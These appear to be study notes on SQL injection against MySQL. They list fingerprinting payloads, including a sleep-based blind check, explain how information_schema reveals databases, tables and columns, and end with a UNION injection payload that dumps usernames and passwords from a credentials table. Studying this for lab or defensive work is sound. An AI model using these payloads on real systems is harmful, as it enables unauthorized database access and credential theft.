# Database Enumeration

## MySQL fingerprinting 

We need to know webserver we are running. Also for the dbms like IIS to be MSSQL

Payload | When to use | Expected Output | Wrong Output 
--------|-------------|-----------------|---------------
select @@version | When we have full query output |  	MySQL Version 'i.e. 10.3.22-MariaDB-1ubuntu1' | In MSSQL it returns MSSQL version , Error with other DBMS
select pow(1,1) | when we only have numeric output | 1 | Error with other DBMS
Select Sleep(5) | Blind / no output | Delays page response for 5 seconds and return 0 | Will not delay wresponse with other DBMS 

## Information schema database 

* [info](https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html)

To pull data from tables using `union select` we need to properly form our select queries to do.

* List of databases 
* list of tables within each database 
* list of columns within each table 

So to refrence a table in anohter DB, we can use the dot `.` operator.

```
SELECT * FROM my_database.users;

```

## Schemata 

* [Schemata](https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html)

The Schema\_name column contains all the database names currently present

```
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
```


## Tables 

* [Tables](https://dev.mysql.com/doc/refman/8.0/en/information-schema-tables-table.html)

The tables table contains information about all tables throughout the database. this table contains multple columns but we are interedted in the tabla\_schema and table\_name. it stores tablenames while table schema column point to the database each table belongs to 

## Columns 

* [Columns](https://dev.mysql.com/doc/refman/8.0/en/information-schema-columns-table.html)

Contains ifnormation about all columns present in all the databases .

* Column\_name
* Table\_name 
* Table\_schema 

## Data 

cn' UNION select 1, username, password, 4 from dev.credentials-- -


